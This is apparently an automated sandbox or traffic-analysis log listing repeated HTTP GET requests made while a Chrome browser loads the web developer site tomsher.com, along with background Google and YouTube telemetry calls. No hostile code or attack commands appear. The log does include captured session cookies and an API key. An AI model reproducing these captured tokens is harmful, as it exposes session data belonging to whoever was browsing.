Source: global trafficHTTP traffic detected: GET /assets/css/progressbar.css HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/css/meanmenu.min.css HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/css/master.css HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/css/style.css HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/css/custom.css HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/logo.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/custom_ecommerce.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=VASp9VTeCaBe1PLkzEqnccvwZaPY6AP78JH8fEeF3Jd2EG1HnBWKdPqRRlTIpKK3AtHCRjR7mL3-tWMdjL3cjs8NFWn2q-bEc2qV8m0K5qWSD9hArF1ow8Ny_0CSqN8EhEJRotk6azSZThaN93PH74PWuBNKiY0gkSfZ4GCv90QESIp_Rl6vyVV9_Q
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/adobe.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/opencart.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/jquery-3.6.0.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/multimedia.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/procurement.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu3.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/Omnichannel.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/web-application.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=VASp9VTeCaBe1PLkzEqnccvwZaPY6AP78JH8fEeF3Jd2EG1HnBWKdPqRRlTIpKK3AtHCRjR7mL3-tWMdjL3cjs8NFWn2q-bEc2qV8m0K5qWSD9hArF1ow8Ny_0CSqN8EhEJRotk6azSZThaN93PH74PWuBNKiY0gkSfZ4GCv90QESIp_Rl6vyVV9_Q
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu4.webp HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.4.2/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tomsher.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.4.2/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tomsher.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.4.2/webfonts/fa-regular-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tomsher.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=VASp9VTeCaBe1PLkzEqnccvwZaPY6AP78JH8fEeF3Jd2EG1HnBWKdPqRRlTIpKK3AtHCRjR7mL3-tWMdjL3cjs8NFWn2q-bEc2qV8m0K5qWSD9hArF1ow8Ny_0CSqN8EhEJRotk6azSZThaN93PH74PWuBNKiY0gkSfZ4GCv90QESIp_Rl6vyVV9_Q
Source: global trafficHTTP traffic detected: GET /assets/images/menu/custom-web.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/fresha.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=ylu3SfIdsVLC_CHJuNK6_egYjIZZxUDFJ_cj1fT_2BK-RHIkQMCDF3SxlhTWanGSvI-ortHlt71N1ulTaErrJpJMlpAvjXGGiOjIWOV5dBabNo6yHeraOvwQrYHrXF9zX11rdAVXQUu84TjdSC40o0yHl5-pR7W7r68n0V8OnPW4GDi2GjED2FnwMP0
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8 HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/vps.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/tomsher.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/captcha.jpg HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=ylu3SfIdsVLC_CHJuNK6_egYjIZZxUDFJ_cj1fT_2BK-RHIkQMCDF3SxlhTWanGSvI-ortHlt71N1ulTaErrJpJMlpAvjXGGiOjIWOV5dBabNo6yHeraOvwQrYHrXF9zX11rdAVXQUu84TjdSC40o0yHl5-pR7W7r68n0V8OnPW4GDi2GjED2FnwMP0
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=ylu3SfIdsVLC_CHJuNK6_egYjIZZxUDFJ_cj1fT_2BK-RHIkQMCDF3SxlhTWanGSvI-ortHlt71N1ulTaErrJpJMlpAvjXGGiOjIWOV5dBabNo6yHeraOvwQrYHrXF9zX11rdAVXQUu84TjdSC40o0yHl5-pR7W7r68n0V8OnPW4GDi2GjED2FnwMP0
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=ylu3SfIdsVLC_CHJuNK6_egYjIZZxUDFJ_cj1fT_2BK-RHIkQMCDF3SxlhTWanGSvI-ortHlt71N1ulTaErrJpJMlpAvjXGGiOjIWOV5dBabNo6yHeraOvwQrYHrXF9zX11rdAVXQUu84TjdSC40o0yHl5-pR7W7r68n0V8OnPW4GDi2GjED2FnwMP0
Source: global trafficHTTP traffic detected: GET /assets/images/menu/sms.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/school.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/ecwid.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/cdn.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
